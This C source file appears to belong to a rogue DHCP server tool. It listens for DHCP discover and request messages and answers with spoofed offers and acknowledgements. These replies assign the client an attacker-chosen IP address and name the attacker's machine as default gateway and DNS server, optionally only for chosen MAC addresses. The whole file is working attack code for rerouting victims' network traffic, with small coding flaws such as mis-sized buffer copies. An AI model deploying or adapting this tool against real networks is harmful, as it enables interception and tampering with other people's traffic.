#include <stdio.h>
#include <stdarg.h>
#include <stddef.h>
#include <string.h>
#include <arpa/inet.h>
#include "dhcp.h"
#include "dhcprogue.h"
#include "socket.h"
#include "mac.h"

#define DHCP_ADD_OPTION(offset, packet, tag, length, typecast, value)	(packet)->options[offset]                  	= tag;		\
									(packet)->options[offset + 1]              	= length;	\
									* (typecast) & ((packet)->options[offset + 2])	= value;	\
									offset += length + 2

void print_field(char *field, char *format, ...) {

	char tmp[512];
	char tmp2[512];
	va_list args;
	
	memset(&tmp,  0, sizeof(tmp));
	memset(&tmp2, 0, sizeof(tmp2));
	
	snprintf(tmp, sizeof(tmp), "%-30s\t\t", field);
	
	va_start(args, format);
	vsnprintf(tmp2, sizeof(tmp2), format, args);
	va_end(args);

	msg("%s%s", tmp, tmp2);
}

void dhcp_dump_packet(struct dhcp_packet *packet, unsigned int size) {

	unsigned int i = 4;
	unsigned int options_len = size - DHCP_FIXED_LEN;

	msg("Dumping packet (%d bytes)", size);
	msg("");
	msg("*** DHCP Header *** (%d bytes)", DHCP_FIXED_LEN);

	switch(packet->op) {
		case REQUEST:
			print_field("packet->op", "%s", "REQUEST");
			break;
		case REPLY:
			print_field("packet->op", "%s", "REPLY");
			break;
		default:
			print_field("packet->op", "%02x", packet->op);
			break;
	}

	print_field("packet->htype",  "%x",  (unsigned int)  packet->htype);
	print_field("packet->hlen",   "%d",  (unsigned int)  packet->hlen);
	print_field("packet->hops",   "%d",  (unsigned int)  packet->hops);
	print_field("packet->xid",    "%x", (unsigned long) packet->xid);
	print_field("packet->secs",   "%d",  (unsigned int)  packet->secs);
	print_field("packet->flags",  "%x",  (unsigned int)  packet->flags);
	print_field("packet->ciaddr", "%s",  inet_ntoa(packet->ciaddr));
	print_field("packet->yiaddr", "%s",  inet_ntoa(packet->yiaddr));
	print_field("packet->siaddr", "%s",  inet_ntoa(packet->siaddr));
	print_field("packet->giaddr", "%s",  inet_ntoa(packet->giaddr));
	print_field("packet->chaddr", "%02x:%02x:%02x:%02x:%02x:%02x", packet->chaddr[0], packet->chaddr[1], packet->chaddr[2], packet->chaddr[3], packet->chaddr[4], packet->chaddr[5]);
	print_field("packet->sname",  "%s",  packet->sname);
	print_field("packet->file",   "%s",  packet->file);
	
	msg("");
	msg("*** DHCP Options *** (%d bytes)", options_len);
	
	print_field("Magic Cookie",   "%lx", * (unsigned long *) ((void *) &packet->options));

	while(i < options_len && options_len > 0) {
	
		if(i > 500)
			fatal("erroneous i");
	
		int option_type = (unsigned int) packet->options[i];
		int option_length = (unsigned int) packet->options[i+1];
		void *option_value = (void *) &packet->options[i+2];
		
		switch(option_type) {
			case DHO_SUBNET_MASK:
				print_field("Subnet-mask", "%s (%d bytes)", inet_ntoa(*(struct in_addr *) option_value), option_length);
				break;
		
			case DHO_ROUTERS:
				print_field("Default-Gateway", "%s (%d bytes)", inet_ntoa(*(struct in_addr *) option_value), option_length);
				break;
		
			case DHO_DOMAIN_NAME_SERVERS:
				print_field("Domain-Name-Server", "%s (%d bytes)", inet_ntoa(*(struct in_addr *) option_value), option_length);
				break;
		
			case DHO_DHCP_REQUESTED_ADDRESS:
				print_field("Requested-IP", "%s (%d bytes)", inet_ntoa(*(struct in_addr *) option_value), option_length);
				break;
			
			case DHO_DHCP_MESSAGE_TYPE:
				
				switch(* ((char *) option_value)) {
					case DHCPDISCOVER:
						print_field("DHCP-Message", "DHCPDISCOVER (%d bytes)", option_length);
						break;
					case DHCPOFFER:
						print_field("DHCP-Message", "DHCPOFFER (%d bytes)", option_length);
						break;
					case DHCPREQUEST:
						print_field("DHCP-Message", "DHCPREQUEST (%d bytes)", option_length);
						break;
					case DHCPDECLINE:
						print_field("DHCP-Message", "DHCPDECLINE (%d bytes)", option_length);
						break;
					case DHCPACK:
						print_field("DHCP-Message", "DHCPACK (%d bytes)", option_length);
						break;
					case DHCPNAK:
						print_field("DHCP-Message", "DHCPNAK (%d bytes)", option_length);
						break;
					case DHCPRELEASE:
						print_field("DHCP-Message", "DHCPRELEASE (%d bytes)", option_length);
						break;
					case DHCPINFORM:
						print_field("DHCP-Message", "DHCPINFORM (%d bytes)", option_length);
						break;
					default:
						print_field("DHCP-Message", "%02x (%d bytes)", *((char *) option_value), option_length);
						break;
				}
				break;

			case DHO_DHCP_PARAMETER_REQUEST_LIST:
				print_field("Parameter-Request", "%x (%d bytes)", *(unsigned int *) option_value, option_length);
				break;

			case DHO_DHCP_SERVER_IDENTIFIER:
				print_field("Server-ID", "%s (%d bytes)", inet_ntoa(*(struct in_addr *) option_value), option_length);
				break;
			
			case DHO_DHCP_LEASE_TIME:
				print_field("Lease-Time", "%d (%d bytes)", *(unsigned int*) option_value, option_length);
				break;
	
			case  DHO_DHCP_RENEWAL_TIME:
				print_field("Renewal-Time", "%d (%d bytes)", *(unsigned int*) option_value, option_length);
				break;
	
			case DHO_DHCP_REBINDING_TIME:
				print_field("Rebinding-Time", "%d (%d bytes)", *(unsigned int*) option_value, option_length);
				break;
	
			case DHO_END:
				msg("");
				i += size;
				break;
			
			default:
				print_field("Unknown Option", "??? (%d bytes)", option_length);
				break;
		}
		i += option_length + 2;
	}
}

void dhcp_dump_raw(struct dhcp_packet *packet, unsigned int size) {

	int i, z = 0;
	unsigned char c;
	
	for(i = 0; i < size; i++) {
		c = * (((char *) packet) + i);
		
		printf(" %02x ", c);
		
		if(++z == 8) {
			putchar('\n');
			z = 0;
		}
	}
	putchar('\n');
}

void dhcp(int sock, struct dhcp_packet *packet, unsigned int size, struct sockaddr_in *addr) {

	struct dhcp_packet reply;
	struct sockaddr_in ip;
	unsigned int reply_size = 4;
	unsigned int i = 4;
	unsigned int messagetype = 0;
	unsigned int options_len = size - DHCP_FIXED_LEN;
	
	char op_recv[128], op_send[128];
	unsigned int respond = FALSE;
	
	memset(&reply, 0, sizeof(reply));
	memset(&ip, 0, sizeof(ip));
	memset(&op_recv, 0, sizeof(op_recv));
	memset(&op_send, 0, sizeof(op_send));
	
	while(i < options_len && options_len > 0) {
	
		int option_type     = (unsigned int) packet->options[i];
		int option_length   = (unsigned int) packet->options[i + 1];
		void * option_value = (void *) &packet->options[i + 2];

		switch(option_type) {
			case DHO_DHCP_MESSAGE_TYPE:
				messagetype = *((char *) option_value);
				break;
			default:
				break;
		}
		i += option_length + 2;
	}

	switch(messagetype) {
		case DHCPDISCOVER:
			strncpy(op_recv, "DHCPDISCOVER", sizeof(op_send));
			strncpy(op_send, "DHCPOFFER", sizeof(op_send));
			respond = TRUE;
			DHCP_ADD_OPTION(reply_size, &reply, DHO_DHCP_MESSAGE_TYPE, 1, unsigned int *, DHCPOFFER);
			break;

		case DHCPOFFER:
			strncpy(op_recv, "DHCPOFFER", sizeof(op_recv));
			break;
			
		case DHCPREQUEST:
			strncpy(op_recv, "DHCPREQUEST", sizeof(op_recv));
			strncpy(op_send, "DHCPACK", sizeof(op_send));
			respond = TRUE;
			DHCP_ADD_OPTION(reply_size, &reply, DHO_DHCP_MESSAGE_TYPE, 1, unsigned int *, DHCPACK);
			break;

		case DHCPDECLINE:
			strncpy(op_recv, "DHCPDECLINE", sizeof(op_recv));
			break;
					
		case DHCPACK:
			strncpy(op_recv, "DHCPACK", sizeof(op_recv));	
			break;
		
		case DHCPNAK:
			strncpy(op_recv, "DHCPNAK", sizeof(op_recv));
			break;
		
		case DHCPRELEASE:
			strncpy(op_recv, "DHCPRELEASE", sizeof(op_recv));
			break;
			
		case DHCPINFORM:
			strncpy(op_recv, "DHCPINFORM", sizeof(op_recv));
			break;

		default:
			snprintf(op_recv, sizeof(op_recv), "%02x", messagetype);
			break;
	}

	if(!respond || (target_mac && !mac_equals(target_mac, packet)) || (!target_mac && mac_file && !mac_get_ip(packet->chaddr))) {
		msg("Ignoring %s from %02x:%02x:%02x:%02x:%02x:%02x (%s:%d)", 
		    op_recv,
		    packet->chaddr[0], packet->chaddr[1], packet->chaddr[2], packet->chaddr[3], packet->chaddr[4], packet->chaddr[5],
		    inet_ntoa(addr->sin_addr),
		    ntohs(addr->sin_port)
		);
		return;
	} else {
		if(!target_mac && mac_file && mac_get_ip(packet->chaddr)) {
			spoof_ip = mac_get_ip(packet->chaddr);
		}
		msg("Received %s from %02x:%02x:%02x:%02x:%02x:%02x (%s:%d)", 
		     op_recv,
		     packet->chaddr[0], packet->chaddr[1], packet->chaddr[2], packet->chaddr[3], packet->chaddr[4], packet->chaddr[5],
		     inet_ntoa(addr->sin_addr),
		     ntohs(addr->sin_port)
		);		
	}

	reply.op     	    = REPLY;
	reply.htype  	    = 0x01;
	reply.hlen   	    = 0x06;
	reply.hops          = 0;
	reply.xid   	    = packet->xid;
	reply.secs   	    = 0;
	reply.flags         = 0;
	reply.ciaddr.s_addr = 0;
	reply.yiaddr.s_addr = inet_addr(spoof_ip);
	reply.siaddr.s_addr = inet_addr(spoof_gateway);
	reply.giaddr.s_addr = 0;
			
	memcpy(reply.chaddr, packet->chaddr, sizeof(reply.chaddr));
	memcpy(reply.options, packet->options, sizeof(char) * 4);

	DHCP_ADD_OPTION(reply_size, &reply, DHO_SUBNET_MASK,		4, unsigned int *, inet_addr(spoof_netmask));
	DHCP_ADD_OPTION(reply_size, &reply, DHO_DHCP_SERVER_IDENTIFIER, 4, unsigned int *, inet_addr(spoof_gateway));
	DHCP_ADD_OPTION(reply_size, &reply, DHO_ROUTERS, 		4, unsigned int *, inet_addr(spoof_gateway));
	DHCP_ADD_OPTION(reply_size, &reply, DHO_DOMAIN_NAME_SERVERS,	4, unsigned int *, inet_addr(spoof_dns));
	DHCP_ADD_OPTION(reply_size, &reply, DHO_DHCP_RENEWAL_TIME,	4, unsigned int *, 129600);
	DHCP_ADD_OPTION(reply_size, &reply, DHO_DHCP_REBINDING_TIME,	4, unsigned int *, 226800);
	DHCP_ADD_OPTION(reply_size, &reply, DHO_DHCP_LEASE_TIME,	4, unsigned int *, 259200);

	ip.sin_family = AF_INET;
	ip.sin_port = addr->sin_port;
	ip.sin_addr.s_addr = INADDR_BROADCAST;
	
	msg("Sending %s %s to %02x:%02x:%02x:%02x:%02x:%02x (%s:%d)", 
		op_send,
		spoof_ip,
		reply.chaddr[0], reply.chaddr[1], reply.chaddr[2], reply.chaddr[3], reply.chaddr[4], reply.chaddr[5],
		inet_ntoa(ip.sin_addr),
		ntohs(ip.sin_port)
	);
	socket_send(sock, &reply, reply_size + DHCP_FIXED_LEN, &ip);

	if(debugmode)
		dhcp_dump_packet(&reply, reply_size + DHCP_FIXED_LEN);
}

void dhcp_loop_packets(int sock) {

	struct sockaddr_in addr;
	struct dhcp_packet packet;
	char recv_buffer[4097];
	
	for(;;) {
		memset(&addr, 0, sizeof(addr));
		memset(&packet, 0, sizeof(packet));
		memset(&recv_buffer, 0, sizeof(recv_buffer));
	
		unsigned int sz = socket_receive(sock, &recv_buffer, sizeof(recv_buffer) - 1, &addr);
		
		if(sz > sizeof(packet))
			sz = sizeof(packet);
			
		memcpy(&packet, &recv_buffer, sz);

		if(debugmode) {
			dhcp_dump_packet(&packet, sz);
			msg("");
#ifdef DEBUG		
			dhcp_dump_raw(&packet, sz);
#endif
		}
		dhcp(sock, &packet, sz, &addr);
	}
}
